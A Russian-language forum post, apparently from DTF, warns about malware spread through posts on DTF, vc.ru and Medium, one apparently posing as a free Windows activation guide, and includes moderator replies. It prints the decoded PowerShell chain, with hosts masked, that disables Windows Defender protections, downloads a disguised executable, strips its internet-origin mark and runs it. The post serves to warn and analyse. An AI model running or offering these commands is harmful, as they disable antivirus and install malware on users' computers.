Cyber Threat Warning

Cyber Threat Warning

На днях несколько пользователей предотвратили широкое распространение вируса из поста на DTF.

Пост был быстро удалён. Аккаунт почему-то не забанен/не удалён.

Такой же пост появился и на vc.ru.
Возможно, в силу низкой активности там некому сообщить об опасности.
Я не могу этого сделать потому что у меня нет там аккаунта.
Регистрироваться же только ради этого не хочется.

Не могли бы вы передать коллегам адрес страницы с опасной инструкцией?

VC-шный «герой»

DTF-ский «герой»

Дальше можно не читать.
Дальше поверхностные измышления.

В силу своих скромных способностей/возможностей к детальному пониманию и описанию подробностей расскажу хоть как-то.
Вирус предназначен для заражения компьютеров под управлением Windows. Obviously. :-|
Команды зашифрованы в base64.
Я даже не знал, что PowerShell может принимать на вход, интерпретировать и выполнять строки в base64.
Это чтобы понимать уровень моей «экспертизы». :-(

Адреса/имена я заменил на '?' на всякий случай.

Первая команда добавляет в исключения Защитника Windows файлы скринсейверов (.scr):

Add-MpPreference -ExclusionExtension "*.scr"

Вторая команда загружает с Pastebin такую директиву:

Invoke-WebRequest -Uri 'https://pastebin.com/raw/????????' -UseBasicParsing | Select-Object -ExpandProperty Content | Invoke-Expression

Она отключает защиту в режиме реального времени, загружает с удалённого сервера файл с расширением .jpeg и сохраняет его в папке TEMP как файл с расширением .scr.
На самом деле, это исполняемый файл.
С него снимается признак файла или удаляются/подавляются/игнорируются данные (ADS) о том, что он получен из интернета; путь до него также добавляется в исключения Защитника; файл пытается выполниться:

Set-MpPreference -DisableRealtimeMonitoring $true; $flnm="$env:TEMP\b3e8f123-a4b5-4c6d-8e9f-10a1b2c3d4e5.scr"; Invoke-WebRequest -Uri "https://?.???.??/2024/10/13/1728798955-7795.jpeg" -OutFile $flnm; if (Get-Item -Path $flnm -Stream "Zone.Identifier" -ErrorAction SilentlyContinue) { Remove-Item -Path "$flnm:Zone.Identifier" }; Add-MpPreference -ExclusionPath $flnm; & $flnm

Это было самое простое.
Кто-то грамотней меня может меня поправить и указать на то, что я не так понял, а если не лень, то расписать всю последовательность обычным языком.

Со сложным я не справился.

Что несёт в себе payload я не знаю.

Я скачал вирус к себе на компьютер, извлёк содержимое .exe-файла, но яснее не стало.

Код извлечь я не смог, а если бы и смог, то, скорее всего, не смог бы его прочитать и понять.

Автор скрипта для доставки полезной нагрузки на Pastebin, уже успел поменять имя и путь до файла как минимум один раз. Скорее всего он делает это раз в сутки.

Контрольные суммы файла полезной нагрузки остаются неизменными. Файл тот же самый.

Если кто-то увидит у себя на компьютере файл размером 365056 байт и такой иконкой — это повод насторожиться:

Cyber Threat Warning

Я отправил его на VirusTotal.
До меня его ещё не загружали на сервис.
Результаты на скриншотах:

Cyber Threat Warning
Cyber Threat Warning

Краткий поиск по кодовым именам угроз ясности не добавил.
Какой-то троян; возможно, стилер или шифровальщик.
Dr.Web, к примеру, не находит ничего подозрительного.

Если на DTF найдётся скучающий эксперт по информационной безопасности, возможно он сможет разобрать алгоритм угрозы.

Прямые ссылки на вирус давать не буду; всё это легко находится при желании.

Ссылка на результаты проверки на VirusTotal

Размер файла: 365056 байт

Обновление и итог:

модераторы удалили все найденные мной страницы и несколько пропущенных.

Помимо DTF и VC эти инструкции нашлись на:

И только я сделал вывод, что целью были русскоязычные пользователи, как инструкция нашлась на Medium

И хотя, на всех ресурсах кроме DTF и VC они по-прежнему доступны, угрозы эти способы на данный момент не представляют, так как страница с директивой для скачивания и применения полезной нагрузки больше не существует на Pastebin:

Not Found (#404)
This page is no longer available. It has either expired, been removed by its creator, or removed by one of the Pastebin staff.

На этом, кажется, всё.
Продолжение следует…

99
11
24 комментария
Автор

@Шериф, обратите внимание, пожалуйста!
Прочитайте хотя бы начало моего поста.

Или кто-то на DTF у кого есть аккаунт на VC мог бы помочь и предупредить модераторов.

3
1

Коллегам на vc передал.
А на DTF автор был забанен в тот же день. Мы не ограничились просто удалением поста.

2

Там уже следующий нарисовался:
@kualexandra

1

Дароу, а шо, теперь после бана личка продолжает работать с челиком?

1
Автор

Понял.
Спасибо!

Автор

@Рейнджер
снова vc:

https://vc.ru/u/4065051-vladislav/1582302-kak-besplatno-aktivirovat-windows-10-i-11-prostye-sposoby

Если я вас достал уже этим, то скажите и я перестану. :-|

Очень благодарны, спасибо большое!

1
1